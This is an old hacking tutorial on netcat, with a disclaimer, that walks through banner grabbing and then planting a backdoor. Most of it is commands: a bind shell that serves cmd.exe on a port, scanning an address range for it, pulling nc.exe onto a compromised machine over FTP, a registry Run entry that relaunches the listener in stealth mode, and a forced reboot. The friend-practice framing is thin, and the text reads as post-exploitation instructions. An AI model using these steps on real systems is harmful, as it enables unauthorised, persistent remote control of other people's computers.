|
Date: 2003-11-14
Written by: mxpack3t
Email:
This e-mail address is being protected from spam bots, you need JavaScript enabled to view it
Disclosure: Copyright 2003 mxpack3t. This document is protected by international copyright laws. Unauthorized duplication in whole or in part is prohibited. In no way do I promote hacking for illegal actions. The knowledge you gain from this tutorial you are responsible for. The tutorial is for educational and security purpose only and nothing else.
=====================================================================================
This tutorial puts you into a hackers point of view. Do not penetrate any systems and do not setup backdoors on a system you do not have permission on. It's illegal and you will get busted sooner or later. I can not be held responsible for your actions.
Netcat by far can be the most reliable tool in any hackers arsenal of tools. There are so many things netcat can do for you. Here you will learn some basic commands to understand what netcat is and how hackers use this tool.
Download Site
The good thing about netcat is that there is a linux/unix and windows version. So now that you have it, lets get started. In this tutorial I will show you how netcat can be used to get banner information and setting it up as a back door on another system.
Banner grabbing is very important in the fingerprinting process. Let's say there is an exploit that you know of for Apache 1.3.27 on a linux machine. And the target system is running IIS 5.0 Microshaft. Oh, I'm sorry, it's called Microsoft. Since the target system is running IIS 5.0 Microsoft, the exploit will not work. But so many times newbies will just fireup that exploit and try it anyway. What a waist of time and effort. Now that you know the exploit will not work on the target you will need to find another way. So how do we do this banner grabbing stuff you're talking about? Simple, use netcat to find out what webserver is running and what type of OS it is.
C:\nc11nt> echo 'HEAD / HTTP/1.0' | nc domain_name.com 80
HTTP/1.1 400 Bad Request
Date: Wed, 13 Aug 2003 16:44:01 GMT
Server: Apache/1.3.27 (Unix) mod_gzip/1.3.26.1a FrontPage/5.0.2.2510 mod_jk/1.1.0
Connection: close
Content-Type: text/html; charset=iso-8859-1
**** Also below here you will see a 400 error. ****
What you need to look for is the Server: line. After Server: you will notice the system is running Apache/1.3.27 and it's a Unix system. Now the exploit might work and it might not work. There are many reasons for this. One the system is patched and the exploit will not work. The other is more detailed. The exploit might not work on some linux/unix systems. Ever heard of the apache-nosejob code. Well the thing about that is the code was written for FreeBSD and OpenBSD systems. The code did not work on, lets say a Redhat linux system. So even if you do have the exploit code, sometimes you need to recode it to work on another type OS. That's why it's so important to learn the c language, since most exploits are written in the c language.
Here is another way of getting the same information. Above what we did is echo the HEAD / HTTP/1.0 command and piped it to netcat. So if you don't want to do it that way then you can do it this way instead.
Open up your favorite text editor. Now type this.
HEAD / HTTP/1.0
(press_enter)
(press_enter)
Make sure that you press enter twice. Now save it as head.txt and go back to netcat. Now type this into the command shell.
C:\nc11nt> nc -v domain_name.com 80 < head.txt
What netcat does is read what's in the head.txt file. Make sure to have the head.txt file in the same directory as you have netcat. Now make a get.txt file. Do the same thing except replace HEAD with GET and it will get the whole page. I don't like doing this. All you need is the HEAD command in the file. Do not type (press_enter) in the file, just hit the enter key twice.
Use this to find some information about the target system. Now lets move onto something else. Like how someone could setup a backdoor using netcat. This section is best done with a friend. So call up a hacker buddy and both of you can practice setting up backdoors on each other. Tell your friend to download netcat. I am going to make this simple so you can get a good understanding. Then we can move onto more difficult things on setting up backdoors with netcat.
Now your friend has netcat installed make sure both of you are in the netcat directory. This next part is very important. Have your friend type this on the command line.
C:\nc11nt> nc -l -p 9191 -e cmd.exe
What this command does is setup netcat to listen on port 9191. Now when you connect to the system on port 9191 with netcat it will bind to that port. Here is what the options mean.
-l = connect over and over again with the same process.
-p 9191 = p is for port and 9191 is the port number.
-e cmd.exe = this will spawn a command shell to you when you connect
Now it's time for you to connect to your friends system. So type this command.
C:\nc11nt> nc 192.168.1.1 9191
Replace 192.168.1.1 with your friends ip address. If you don't know the ip address no problem. Just scan the c class for port 9191 and you will find your friends system.
A great tool for this is scanline from Foundstone.
Download scanline (click Resources, Free Tools, Then Scanning Tools)
Scanline is a command line program. Those command line tools are great. Go to the scanline directory in the command prompt. Now type this to scan a c class for a certain port.
C:\scanline> sl -bht 9191 192.168.1.1-255
-b = get port banners
-h = hide results with systems that don't have port 9191 open
-t = tcp port to scan
Ok, now it's time to have some real fun. Tell your friend to setup netcat to listen on a port. Let's say 8000 is the port. We will say that port 8000 is running a new chat program that everybody likes to use. There is a exploit that came out for this new chat program. So you fire up this exploit and run it against the system using 8000 as the port. Let's say netcat is that exploit. This is just an example. So run netcat targeting your friends system. Remember you can use scanline to scan for systems with port 8000 open. We are just pretending netcat is a new exploit that came out for the chat client, that will drop you into a command prompt. This is just an example.
c:\netcat> nc 192.168.1.1 8000
This will drop you into a command prompt. Kinda like the dcom rpc exploit. Ok, so you are in the system. Now theres no time to waste. You need to setup netcat as the backdoor. Here is one way of doing this. Download nc.exe from a free ftp account and put it into the system32 folder. Some people might say it's wrong to put it in system32, but it will run. Besides it works and that's all that matters. There are a lot of free webhosting that you can store files and ftp to the account.
Now that you are in the system and have a command shell do these commands.
cd c:\WINDOWS\system32
ftp free_account.domain.com
Now there is something you should remember. If not then this will not work. Make sure you upload netcat in binary format. I say again make sure you upload netcat in binary format. Also make sure you download in binary format. When you ftp to your account just type binary and that will put you in binary mode. If you do not do this, when you try to run netcat you will get an error. Now that you have downloaded netcat on the target machine it's time to set it up as a backdoor. We will put netcat in the registry; so when the system is rebooted then it will listen on the port you want. So type this on the target machine in the command prompt from netcat to set it up.
reg add hklm\software\microsoft\windows\currentversion\run /v backdoor /t reg_sz /d nc -l -d -p 9191 -e cmd.exe
Didn't work. The error you got should have said something like this. To many command line parameters. The reason for this is we need to put " " in the command when ever there is spaces. So rewrite it like this.
reg add hklm\software\microsoft\windows\currentversion\run /v backdoor /t reg_sz /d "nc -l -d -p 9191 -e cmd.exe"
Now it should work fine. There are a few things that need to be covered. If you do not understand what the registry is, then don't bother with it. Go to google and read up on reg add and reg delete to fully undertand what you are doing. The command reg add just adds things to the registry. So here is what the options mean.
v/ = Entry Name we named it backdoor
t/ = Data type like ascii or binary
d/ = Value in other words the command to execute.
Also you will notice a new option in the nc command. The -d option means stealth mode.
So when the system is rebooted, netcat will listen on port 9191 for you. So all you need to do is this.
nc 192.168.1.1 9191 and your set!
So tell your friend to check the registry with regedit. Backdoor should be there. Now reboot the system for him!
shutdown -r -t 1
-r = reboot
-t = pause 1 second before rebooting, default is 30 seconds.
When the system comes back up it will be listening on port 9191 for you. So go ahead and connect with this command.
nc 192.168.1.1 9191 and you are now connected to your friends ip address.
Now that you have succesfully setup a backdoor, it's time to remove it. Just a reminder. Always kill the nc.exe process on the computer that is listening on a port. If someone scans your friend and uses netcat they can connect to his system. I would suggest making a new account and then remove it when your done. This is how you will delete the backdoor from the registry. In the command prompt on the target machine, type this.
reg delete hklm\software\microsoft\windows\currentversion\run /v backdoor
Make sure to tell your friend to check the registry to make sure it is removed.
That's it for now. Hope you enjoyed the tutorial. Make sure to leave comments on the forums.
-mxpack3t
Related Items:
|
